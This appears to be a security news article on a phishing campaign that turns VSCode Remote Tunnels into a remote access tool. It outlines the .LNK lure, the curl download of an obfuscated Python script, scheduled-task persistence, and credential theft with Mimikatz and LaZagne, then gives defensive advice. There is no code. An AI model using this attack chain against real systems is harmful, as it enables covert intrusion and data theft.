Stealthy Cyberattack Converts Visual Studio Code into a Remote Access Tool

A recent investigation has uncovered a highly sophisticated cyberattack that transforms Visual Studio Code (VSCode) into a remote access tool, allowing unauthorized control over victim systems. This attack demonstrates significant stealth capabilities, bypassing common detection methods and leveraging trusted software to execute malicious actions.

Attack Overview

The attack starts with the distribution of a suspicious .LNK file, disguised as a legitimate installer, typically delivered through phishing emails to lure victims. Once executed, the .LNK file displays a fake success message in Chinese (“安裝成功”), deceiving users into believing the installation was successful. However, in the background, the .LNK file silently downloads a Python distribution package along with additional malicious components using the curl utility.

The downloaded Python script, named update.py, executes in an obfuscated manner to evade detection by security tools. During the investigation, the script had zero detections on VirusTotal, providing attackers with a significant advantage in bypassing standard security defenses.

Stages of the Attack:

Initial Execution:

• Phishing Email: The attack begins with phishing emails containing a .LNK file that masquerades as a legitimate installer.
• Fake Installation: The .LNK file shows a fake success message, misleading users while malicious activities continue in the background.

Downloading and Running Malicious Components:

• Python Script (update.py): The .LNK file downloads a Python distribution along with a script (update.py) using curl.
• Obfuscation and Persistence: The script runs in an obfuscated manner to avoid detection. It had no detections on VirusTotal at the time of the investigation, allowing it to bypass most security tools.

Exploitation of Visual Studio Code:

• VSCode Check: The script checks if VSCode is installed. If not, it downloads the VSCode Command Line Interface (CLI) from a legitimate Microsoft source.
• Scheduled Task Creation: The script creates a scheduled task named “MicrosoftHealthcareMonitorNode,” providing persistence by ensuring the script runs regularly, even after system reboots.

Misuse of VSCode Remote Features:

• VSCode Remote Tunnels Extension: VSCode’s “Remote – Tunnels” extension, which is designed for secure remote machine connections, is misused in this attack. The attackers create a remote tunnel, establishing a gateway to the victim’s machine.
• Stealthy Remote Access: This remote tunnel allows attackers to control the compromised machine without using typical methods like SSH, making their intrusion harder to detect.

Authentication and System Control:

• Activation Code Extraction: Attackers extract an activation code from VSCode’s output files, which is necessary to authenticate their remote session.
• Association with GitHub Account: The activation code is used to associate the victim’s system with the attackers’ GitHub account, providing full access through GitHub’s login page.

Data Exfiltration:

• Data Collection: Once inside the system, attackers begin extracting data from key directories, including program files, user data, and running processes.
• Transmission to C&C Server: The gathered data, including sensitive system information such as location, user privileges, and system language settings, is encoded in Base64 and transmitted to the attackers’ command-and-control (C&C) server.

Further Malicious Activities:

• Command Execution: Attackers can execute commands, manipulate files, and install additional malware.
• Password Extraction: Tools like Mimikatz and LaZagne are used to extract passwords, further expanding the attackers’ control over the compromised system.

Connection to Stately Taurus APT Group

The tactics used in this attack bear similarities to those used by the Chinese advanced persistent threat (APT) group known as Stately Taurus. This suggests that the attackers may be adopting techniques from sophisticated espionage groups, indicating a coordinated effort.

Recommendations for Users and Organizations:

1. Avoid Clicking on Suspicious Links: Be cautious of email attachments, especially .LNK files, and avoid clicking on links from unknown sources.
2. Keep Security Tools Updated: Ensure antivirus software and endpoint protection tools are updated with the latest threat intelligence.
3. Monitor VSCode Extensions: Regularly check and monitor installed VSCode extensions, especially those related to remote access, for unauthorized configurations.
4. Disable Unnecessary Features: Disable the VSCode “Remote – Tunnels” extension if not needed, reducing the risk of unauthorized access.
5. Use Network Monitoring Tools: Implement network monitoring solutions to detect unusual activities like unauthorized tunnels or scheduled tasks.
6. Educate Users: Train employees to recognize phishing attempts and understand the risks associated with unsolicited files.

Conclusion

The recent attack involving Visual Studio Code being used as a remote access tool highlights the importance of vigilance even when dealing with trusted software. Organizations should adopt proactive security measures, focusing on endpoint protection, user education, and network monitoring to defend against sophisticated cyber threats.